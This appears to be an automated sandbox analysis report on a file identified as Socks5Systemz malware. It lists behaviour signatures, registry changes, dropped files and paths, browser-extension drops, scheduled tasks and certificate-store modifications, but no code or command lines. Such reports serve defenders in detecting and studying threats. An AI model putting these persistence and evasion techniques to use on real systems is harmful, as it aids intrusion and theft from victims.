Analysis Overview
Threat Level: Known bad
The file https://t.co/f017Vqildt was found to be: Known bad.
Malicious Activity Summary
Socks5Systemz
Detect Socks5Systemz Payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Downloads MZ/PE file
Loads dropped DLL
Reads user/profile data of web browsers
Checks BIOS information in registry
Checks computer location settings
Executes dropped EXE
Drops desktop.ini file(s)
Enumerates connected drives
Adds Run key to start application
Drops Chrome extension
Checks installed software on the system
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Program crash
NSIS installer
Modifies Control Panel
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-10 23:08
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-10 23:08
Reported
2024-06-10 23:11
Platform
win10v2004-20240426-en
Max time kernel
210s
Max time network
210s
Command Line
Signatures
Detect Socks5Systemz Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Socks5Systemz
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR\OUvhPIz.dll | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Program Files (x86)\MovZspCuTpPaC\BhIuTuG.xml | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Program Files (x86)\XImIZWEzCDUn\kTsPeqb.dll | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Program Files (x86)\RYkefsiHU\QXOSJUk.xml | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Program Files (x86)\RXHKfDSqirfU2\RWUdiGIIMBtpx.dll | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Program Files (x86)\RXHKfDSqirfU2\VjmwrNA.xml | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR\QsLDxyt.xml | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Program Files (x86)\MovZspCuTpPaC\QAIOVaj.dll | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
| File created | C:\Program Files (x86)\RYkefsiHU\WdGIBp.dll | C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\bozJhwcBWfTIuPvJGw.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\IdVtZOOUCgewbUgTH.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\crLdjPbboKRrxLe.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\abqDtlgLJZrFmRhwl.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b97ed4d9-0000-0000-0000-d01200000000}\NukeOnDelete = "0" | C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\rundll32.exe | N/A |
